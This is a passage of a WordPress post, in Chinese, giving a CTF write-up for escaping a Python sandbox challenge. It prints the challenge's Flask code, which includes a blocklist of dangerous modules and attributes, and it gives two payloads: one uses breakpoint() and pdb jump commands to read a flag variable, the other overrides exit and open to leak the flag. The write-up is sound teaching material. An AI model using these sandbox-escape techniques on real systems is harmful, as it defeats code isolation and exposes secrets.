n<\/code>\uff1a\u5728\u8c03\u8bd5\u5668\u4e2d\uff0cn<\/code> \u547d\u4ee4\u4f1a\u8ba9\u7a0b\u5e8f\u6267\u884c\u5f53\u524d\u884c\u5e76\u8df3\u5230\u4e0b\u4e00\u884c\u3002\u5982\u679c\u4f60\u8fde\u7eed\u591a\u6b21\u4f7f\u7528 n<\/code>\uff0c\u5c31\u4f1a\u8df3\u8fc7\u591a\u884c\u4ee3\u7801\u3002\u4e0d\u8fc7\u6ce8\u610f\uff0c\u5b83\u662f\u6309line<\/code>\u4e8b\u4ef6\uff08\u6267\u884c\u5230\u65b0\u7684<\/p>\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u4e00\u884c\u4ee3\u7801\uff09\u548c\u5728\u5f53\u524dframe\u7684return<\/code>\u4e8b\u4ef6\uff08\u51fd\u6570\u8fd4\u56de\u65f6\uff09\u4ee5\u53caframe\u6682\u505c\uff0c\u6bd4\u5982return\u4f1a\u6682\u505c\u4e24\u6b21\u5e76\u8fd4\u56de\u8c03\u7528\u8005\u90a3\u4e00\u884c<\/p>\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0j<\/code>\uff1a\u547d\u4ee4\u5141\u8bb8\u4f60\u8df3\u8f6c\u5230\u6307\u5b9a\u884c\u53f7\uff0c\u4e0d\u8fc7\u6ce8\u610f\u5728\u6c99\u7bb1\u4e2d\u662f\u5728\u751f\u6210\u7684\u4e34\u65f6\u811a\u672c\u6587\u4ef6\u4e2d\u8df3\u8f6c<\/p>\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0n<\/code>\uff1a\u7ee7\u7eed\u6267\u884c\u63a5\u4e0b\u6765\u7684\u4e00\u884c\u4ee3\u7801<\/p>\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0p<\/code>\uff1a\u6253\u5370\u53d8\u91cf\u7684\u503c<\/p>\n\u5229\u7528\u8fd9\u4e9b\u6211\u4eec\u53ef\u4ee5\u5728python\u6c99\u7bb1\u4e2d\u5b9e\u73b0\u6682\u505c\u7a0b\u5e8f\uff0c\u4efb\u610f\u4ee3\u7801\u8df3\u8f6c\u548c\u53d8\u91cf\u6253\u5370\u3002<\/p>\n
\u4f8b\u9898\uff1a<\/h3>\nimport ast\nimport subprocess\nimport tempfile\nimport os\nimport time\nimport threading\nfrom flask import Flask, render_template, request, jsonify\nfrom flask_socketio import SocketIO, emit\nimport secrets\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = os.environ.get('SECRET_KEY', secrets.token_hex(32))\napp.config['MAX_CONTENT_LENGTH'] = 16 * 1024\nsocketio = SocketIO(app, cors_allowed_origins=\"*\")\n\nactive_processes = {}\n\nclass PythonRunner:\n\n def __init__(self, code, args=\"\"):\n self.code = code\n self.args = args\n self.process = None\n self.output = []\n self.running = False\n self.temp_file = None\n self.start_time = None\n\n def validate_code(self):\n try:\n if len(self.code) > int(os.environ.get('MAX_CODE_SIZE', 1024)):\n return False, \"\u4ee3\u7801\u8fc7\u957f\"\n\n tree = ast.parse(self.code)\n\n banned_modules = ['os', 'sys', 'subprocess', 'shlex', 'pty', 'popen', 'shutil', 'platform', 'ctypes', 'cffi', 'io', 'importlib']\n\n banned_functions = ['eval', 'exec', 'compile', 'input', '__import__', 'open', 'file', 'execfile', 'reload']\n\n banned_methods = ['system', 'popen', 'spawn', 'execv', 'execl', 'execve', 'execlp', 'execvp', 'chdir', 'kill', 'remove', 'unlink', 'rmdir', 'mkdir', 'makedirs', 'removedirs', 'read', 'write', 'readlines', 'writelines', 'load', 'loads', 'dump', 'dumps', 'get_data', 'get_source', 'get_code', 'load_module', 'exec_module']\n\n dangerous_attributes = ['__class__', '__base__', '__bases__', '__mro__', '__subclasses__', '__globals__', '__builtins__', '__getattribute__', '__getattr__', '__setattr__', '__delattr__', '__call__']\n\n for node in ast.walk(tree):\n if isinstance(node, ast.Import):\n for name in node.names:\n if name.name in banned_modules:\n return False, f\"\u7981\u6b62\u5bfc\u5165\u6a21\u5757: {name.name}\"\n\n elif isinstance(node, ast.ImportFrom):\n if node.module in banned_modules:\n return False, f\"\u7981\u6b62\u4ece\u6a21\u5757\u5bfc\u5165: {node.module}\"\n\n elif isinstance(node, ast.Call):\n if isinstance(node.func, ast.Name):\n if node.func.id in banned_functions:\n return False, f\"\u7981\u6b62\u8c03\u7528\u51fd\u6570: {node.func.id}\"\n\n elif isinstance(node.func, ast.Attribute):\n if node.func.attr in banned_methods:\n return False, f\"\u7981\u6b62\u8c03\u7528\u65b9\u6cd5: {node.func.attr}\"\n\n elif isinstance(node.func, ast.Name):\n if node.func.id == 'open':\n return False, \"\u7981\u6b62\u6587\u4ef6\u64cd\u4f5c\"\n\n elif isinstance(node, ast.With):\n for item in node.items:\n if isinstance(item.context_expr, ast.Call):\n if isinstance(item.context_expr.func, ast.Name):\n if item.context_expr.func.id == 'open':\n return False, \"\u7981\u6b62\u6587\u4ef6\u64cd\u4f5c\"\n\n elif isinstance(node, ast.Attribute):\n if node.attr in dangerous_attributes:\n if isinstance(node.value, ast.Call) or isinstance(node.value, ast.Name):\n return False, f\"\u7981\u6b62\u8bbf\u95ee\u5371\u9669\u5c5e\u6027: {node.attr}\"\n\n elif isinstance(node, ast.Subscript):\n if isinstance(node.value, ast.Attribute):\n if node.value.attr == '__subclasses__':\n return False, \"\u7981\u6b62\u8bbf\u95ee__subclasses__\"\n\n return True, \"\u4ee3\u7801\u9a8c\u8bc1\u901a\u8fc7\"\n\n except SyntaxError as e:\n return False, f\"\u8bed\u6cd5\u9519\u8bef: {str(e)}\"\n except Exception as e:\n return False, f\"\u9a8c\u8bc1\u9519\u8bef: {str(e)}\"\n\n def create_script(self):\n try:\n self.temp_file = tempfile.NamedTemporaryFile(\n mode='w', \n suffix='.py', \n dir='\/tmp',\n delete=False\n )\n\n wrapper = \"\"\"\nimport sys\n\ndef safe_exec():\n try:\n{indented_code}\n return 0\n except SystemExit as e:\n return e.code if isinstance(e.code, int) else 0\n except Exception as e:\n print(f\"\u6267\u884c\u9519\u8bef: {{e}}\", file=sys.stderr)\n return 1\n\nsys.argv = ['sandbox.py'] + {args}\n\nexit_code = safe_exec()\n\nexit()\n# Hey bro, don't forget to remove this before release!!!\nimport os\nimport sys\n\nflag_content = os.environ.get('GZCTF_FLAG', '')\nos.environ['GZCTF_FLAG'] = ''\n\ntry:\n with open('\/flag.txt', 'w') as f:\n f.write(flag_content)\nexcept:\n pass\n\"\"\"\n\n indented_code = 'n'.join([' ' + line for line in self.code.split('n')])\n\n full_code = wrapper.format(\n indented_code=indented_code,\n args=str(self.args.split() if self.args else [])\n )\n\n self.temp_file.write(full_code)\n self.temp_file.flush()\n os.chmod(self.temp_file.name, 0o755)\n\n return self.temp_file.name\n\n except Exception as e:\n raise Exception(f\"\u521b\u5efa\u811a\u672c\u5931\u8d25: {str(e)}\")\n\n def run(self):\n try:\n is_valid, message = self.validate_code()\n if not is_valid:\n self.output.append(f\"\u9a8c\u8bc1\u5931\u8d25: {message}\")\n return False\n\n script_path = self.create_script()\n\n cmd = ['python', script_path]\n if self.args:\n cmd.extend(self.args.split())\n\n self.process = subprocess.Popen(\n cmd,\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n stdin=subprocess.PIPE,\n text=True,\n bufsize=1,\n universal_newlines=True\n )\n\n self.running = True\n self.start_time = time.time()\n\n def read_output():\n while self.process and self.process.poll() is None:\n try:\n line = self.process.stdout.readline()\n if line:\n self.output.append(line.strip())\n socketio.emit('output', {'data': line})\n except:\n break\n\n stdout, stderr = self.process.communicate()\n if stdout:\n for line in stdout.split('n'):\n if line.strip():\n self.output.append(line.strip())\n socketio.emit('output', {'data': line})\n if stderr:\n for line in stderr.split('n'):\n if line.strip():\n self.output.append(f\"\u9519\u8bef: {line.strip()}\")\n socketio.emit('output', {'data': f\"\u9519\u8bef: {line}\"})\n\n self.running = False\n socketio.emit('process_end', {'pid': self.process.pid})\n\n thread = threading.Thread(target=read_output)\n thread.daemon = True\n thread.start()\n\n return True\n\n except Exception as e:\n self.output.append(f\"\u8fd0\u884c\u5931\u8d25: {str(e)}\")\n return False\n\n def send_input(self, data):\n if self.process and self.process.poll() is None:\n try:\n self.process.stdin.write(data + 'n')\n self.process.stdin.flush()\n return True\n except:\n return False\n return False\n\n def terminate(self):\n if self.process and self.process.poll() is None:\n self.process.terminate()\n self.process.wait(timeout=5)\n self.running = False\n\n if self.temp_file:\n try:\n os.unlink(self.temp_file.name)\n except:\n pass\n return True\n return False\n\n@app.route('\/')\ndef index():\n return render_template('index.html')\n\n@app.route('\/api\/run', methods=['POST'])\ndef run_code():\n data = request.json\n code = data.get('code', '')\n args = data.get('args', '')\n\n runner = PythonRunner(code, args)\n\n pid = secrets.token_hex(8)\n active_processes[pid] = runner\n\n success = runner.run()\n\n if success:\n return jsonify({\n 'success': True,\n 'pid': pid,\n 'message': '\u8fdb\u7a0b\u5df2\u542f\u52a8'\n })\n else:\n return jsonify({\n 'success': False,\n 'message': '\u542f\u52a8\u5931\u8d25'\n })\n\n@app.route('\/api\/terminate', methods=['POST'])\ndef terminate_process():\n data = request.json\n pid = data.get('pid')\n\n if pid in active_processes:\n active_processes[pid].terminate()\n del active_processes[pid]\n return jsonify({'success': True})\n\n return jsonify({'success': False, 'message': '\u8fdb\u7a0b\u4e0d\u5b58\u5728'})\n\n@app.route('\/api\/send_input', methods=['POST'])\ndef send_input():\n data = request.json\n pid = data.get('pid')\n input_data = data.get('input', '')\n\n if pid in active_processes:\n success = active_processes[pid].send_input(input_data)\n return jsonify({'success': success})\n\n return jsonify({'success': False})\n\n@socketio.on('connect')\ndef handle_connect():\n emit('connected', {'data': 'Connected'})\n\n@socketio.on('disconnect')\ndef handle_disconnect():\n pass\n\nif __name__ == '__main__':\n socketio.run(app, host='0.0.0.0', port=5000, debug=False, allow_unsafe_werkzeug=True)<\/code><\/pre>\n\u76f4\u63a5\u7ed9\u51fapayload\uff1a<\/h5>\nbreakpoint(commands=['n']*3+['j 20']+['n']*3+['p flag_content'])\nbreakpoint(commands=['n','n','n','j 20','n','n','n','p flag_content']) # \u8fd9\u4e2a\u4e5f\u662f\u53ef\u4ee5\u7684zwz<\/code><\/pre>\n\u4e0b\u9762\u5bf9payload\u7ed9\u51fa\u89e3\u91ca\uff1a<\/h5>\n
\u7b2c\u4e00\u4e2an<\/code>\uff1a\u521a\u6267\u884c\u5b8c breakpoint(...)<\/code>\uff0c\u8fd8\u6ca1\u771f\u7684 return\uff0c\u89e6\u53d1line<\/code>\u4e8b\u4ef6\u6682\u505c\uff0c\u505c\u5728return 0<\/code>\u90a3\u91cc<\/p>\n\u7b2c\u4e8c\u4e2an<\/code>\uff1a\u6267\u884creturn<\/code>\uff0c\u89e6\u53d1return<\/code>\u4e8b\u4ef6\u6682\u505c\u3002\u6b64\u65f6\u8fd8\u6ca1\u771f\u6b63\u8fd4\u56de\u3002<\/p>\n\u7b2c\u4e09\u4e2an<\/code>\uff1a\u771f\u6b63\u8fd4\u56de\uff0c\u5e76\u4e14\u89e6\u53d1line<\/code>\u4e8b\u4ef6\u6682\u505c\uff0c\u8fd9\u65f6\u5df2\u7ecf\u6765\u5230\u51fd\u6570\u5916\u90e8\uff0c\u505c\u5728exit()<\/code>\u90a3\u91cc<\/p>\nj 20<\/code>\uff1a\u8df3\u5230\u4e34\u65f6\u811a\u672c\u6587\u4ef6\u7684\u7b2c20\u884c\uff0c\u5373import os<\/code><\/p>\n\u7136\u540e\u4e09\u4e2an<\/code>\uff1a\u6267\u884c\u5b8cflag_content = os.environ.get('GZCTF_FLAG', '')<\/code>\u505c\u5728os.environ['GZCTF_FLAG'] = ''<\/code>\u524d\uff0c\u6b64\u65f6flag\u5df2\u7ecf\u5199\u5165\u53d8\u91cf<\/p>\np flag_content<\/code>\uff1a\u6253\u5370\u53d8\u91cf\uff0c\u5f97\u5230flag<\/p>\n\u9644\u4e00\u4e2a\u5bf9\u4e34\u65f6\u811a\u672c\u6587\u4ef6\u7684\u6807\u53f7\uff1a<\/p>\n
![\"db18516e-e583-4493-be85-e3e97abed077\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u7b2c\u4e8c\u79cd\u6253\u6cd5\uff1a<\/h5>\n
\u4e0a\u4e0b\u6587\u7ba1\u7406\u5668\u662f\u4ec0\u4e48\uff1a\u4e00\u4e2a\u5bf9\u8c61\u53ea\u8981\u5b9e\u73b0\u4e86 __enter__<\/code> \u548c __exit__<\/code> \u4e24\u4e2a\u65b9\u6cd5\uff0c\u5c31\u80fd\u88ab with<\/code> \u4f7f\u7528<\/strong>\u3002<\/p>\nban\u7684\u4e1c\u897f\u5f88\u591a\uff0c\u90a3\u4e48\u5c1d\u8bd5\u6c61\u67d3exit()\u4e3a\u7a7a\uff0c\u5e76\u4e14\u6c61\u67d3withopen(\/flag.txt,w)asf:\u7684\u903b\u8f91\u76f4\u63a5\u8ba9flag\u56de\u663e\u2f7d\u4e0d\u662f\u5199\u2f0a\u2f42\u4ef6\u3002\u4e0d\u8fc7with\u7684\u8c61open\u8981\u662f\u4e00\u4e2a\u4e0a\u4e0b\u6587\u7ba1\u7406\u5668<\/p>\n
payload\uff1a<\/p>\n
global exit, open\n\/\/\u5168\u5c40\u6c61\u67d3exit\u548copen\n\nexit = lambda *a, **k: None\n\/\/\u628a\u540d\u5b57 exit \u7ed1\u5b9a\u5230\u4e00\u4e2a\u65b0\u7684\u53ef\u8c03\u7528\u5bf9\u8c61\uff08\u8fd9\u91cc\u662f lambda \u4ea7\u751f\u7684\u533f\u540d\u51fd\u6570\uff09\uff0c\u63a5\u53d7\u4efb\u610f\u6570\u91cf\u7684\u4f4d\u7f6e\u53c2\u6570 *a\uff0c\u63a5\u53d7\u4efb\u610f\u6570\u91cf\u7684\u5173\u952e\u5b57\u53c2\u6570 **k\n\nclass _Leak:\n\/\/\u81ea\u5b9a\u4e49\u4e00\u4e2a\u7c7b\n\n def __enter__(self): \n return self\n\/\/\u5f53\u5199 with open(...) as f: \u65f6\uff0c\u4f1a\u5148\u6c42\u503c open(...) \u5f97\u5230\u4e00\u4e2a\u5bf9\u8c61\uff08\u79f0\u4e3a context manager\uff09\uff0c\u8c03\u7528\u5b83\u7684 __enter__()\u65f6\uff0c__enter__() \u7684\u8fd4\u56de\u503c\u4f1a\u7ed1\u5b9a\u7ed9 as f \u91cc\u7684 f\n\n def __exit__(self, *exc):\n return False \n\/\/__exit__ \u4e5f\u662f\u4e0a\u4e0b\u6587\u7ba1\u7406\u5668\u534f\u8bae\u7684\u4e00\u90e8\u5206\uff0cwith \u8bed\u53e5\u7ed3\u675f\u65f6\u4e00\u5b9a\u4f1a\u8c03\u7528\u5b83\u3002\n\/\/\u6807\u51c6\u7b7e\u540d\u901a\u5e38\u662f __exit__(self, exc_type, exc, tb)\uff1a\u8868\u793a with \u5757\u91cc\u662f\u5426\u53d1\u751f\u5f02\u5e38\u4ee5\u53ca\u5f02\u5e38\u4fe1\u606f\u3002\n\/\/\u8fd9\u91cc\u7528 *exc \u63a5\u6536\u4efb\u610f\u53c2\u6570\uff0c\u662f\u4e00\u79cd\u201c\u6211\u4e0d\u5173\u5fc3\u5177\u4f53\u5f02\u5e38\u7ec6\u8282\uff0c\u4f46\u6211\u613f\u610f\u63a5\u6536\u5b83\u201d\u7684\u5199\u6cd5\n\/\/\u8fd4\u56de\u503c\u542b\u4e49\uff1a\n\/\/\u8fd4\u56de True\uff1a\u8868\u793a\u201c\u5f02\u5e38\u5df2\u88ab\u6211\u5904\u7406\/\u541e\u6389\u201d\uff0c\u5916\u5c42\u4e0d\u4f1a\u518d\u629b\u51fa\n\/\/\u8fd4\u56de False\uff1a\u8868\u793a\u201c\u4e0d\u541e\u5f02\u5e38\u201d\uff0c\u5982\u679c\u5757\u5185\u6709\u5f02\u5e38\u4ecd\u4f1a\u7ee7\u7eed\u5411\u5916\u629b\n\n def write(self, s):\n print(\"aaaflag\u6279\u53d1\uff1a\", repr(s))\n\/\/\u63d0\u4f9bwrite()\u65b9\u6cd5\uff0c\u5c06\u63a5\u53d7\u5230\u7684\u53c2\u6570\u6253\u5370\u5230\u6807\u51c6\u8f93\u51fa\n\ndef open(*a, **k):\n return _Leak()\n\/\/\u5b9a\u4e49open\u8fd4\u56de\u6211\u4eec\u521a\u521a\u5b9a\u4e49\u7684\u7c7b\uff0c*a, **k \u7684\u4f5c\u7528\u540c\u4e0a\uff1a\u517c\u5bb9\u5404\u79cd\u8c03\u7528\u53c2\u6570\u3002\n\nprint(\"inex\")\n\/\/\u6d4b\u8bd5\u4ee3\u7801\uff0c\u8bf4\u660e\u4ee3\u7801\u6b63\u5e38\u8dd1\u5b8c\u4e86<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"\u5229\u7528breakpoint()\u5728python\u6c99\u7bb1\u4e2d\u5b9e\u73b0\u4ee3\u7801\u8df3\u8f6c\u548c\u53d8\u91cf\u8bfb\u53d6\uff1a breakpoint()\uff1a\u7528\u6765\u5728\u8c03\u8bd5 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-79","post","type-post","status-publish","format-standard","hentry","category-3"],"_links":{"self":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/79","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/comments?post=79"}],"version-history":[{"count":1,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/79\/revisions"}],"predecessor-version":[{"id":90,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/79\/revisions\/90"}],"wp:attachment":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/media?parent=79"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/categories?post=79"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/tags?post=79"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"db18516e-e583-4493-be85-e3e97abed077\"](\"file:\/\/\/C:\/Users\/inex\/Pictures\/Typedown\/db18516e-e583-4493-be85-e3e97abed077.png\")
<\/div><\/p>\n